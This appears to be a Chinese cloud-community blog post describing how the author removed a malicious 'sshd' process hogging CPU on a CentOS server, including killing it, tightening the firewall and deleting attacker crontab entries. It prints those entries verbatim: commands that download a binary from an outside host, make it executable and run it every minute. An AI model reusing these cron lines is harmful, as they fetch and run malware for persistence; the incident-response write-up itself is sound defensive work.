1. 现象

top 命令, 发现有sshd恶意程序运行, 导致CPU占用100%
在这里插入图片描述

2. 排查过程

2.1 找到该恶意程序的绝对路径

ll /proc/{pid}

在这里插入图片描述

2.2 kill进程, 删除恶意程序

rm -rf /var/tmp/*
kill -9 {pid}

2.3 加强防火墙

控制访问该linux的来源IP, 因为是开发用的机器, 只要配置公司和家里的外网出口IP即可.
在这里插入图片描述

2.4 删除恶意的linux定时任务

头痛, 做完 2.1, 2.2, 2.3 后, 恶意程序过一段时间后, 还是会重新下载到/var/tmp目录, 并运行.
最终, 无意中, 发现有恶意的linux定时任务存在, 删除即可!

[root@vm-16-13-centos tmp]# crontab -l
*/5 * * * * flock -xn /tmp/stargate.lock -c '/usr/local/qcloud/stargate/admin/start.sh > /dev/null 2>&1 &'

0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'
* * * * * /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'


[root@vm-16-13-centos tmp]# cat /etc/crontab 
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'
* * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'

3. 参考

# linux # 服务器 # 腾讯云
Logo
腾讯云开发者社区

腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。

更多推荐

Springboot+MySQL 实现从数据库获取数据展示到前端

1.运行效果效果图如下:2.创建数据库表数据库名为"springboot",数据库表名为"user",数据库表里面放了5条数据,字段分别为:“id”,“name”,“age”,“email”。3.新建SpringBoot项目1、选择Spring Initial...

avatar 腾讯云开发者社区

数据库 实验二 数据库的简单查询和连接查询实验

– l)用Transact-SQL语句表示下列操作.在学生选课库中实现其数据查询操作.– ①求数学系学生的学号和姓名。select sno,sname from student where sdept='MA';– ②求选修了课程的学生学号。select distinct sno from sc;– ③求选修C1课程的学生学号和成绩,并要求对查询结果按成绩降序排列,如果成绩相同则按学号升序排列。s

avatar 腾讯云开发者社区

Spring Boot Mybatis数据库datasource多数据源配置

application.yaml文件配置spring:datasource:db1:driver-class-name: com.mysql.cj.jdbc.Driverjdbc-url: jdbc:mysql://192.168.0.1:3306/ellassay_dev?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBe

avatar 腾讯云开发者社区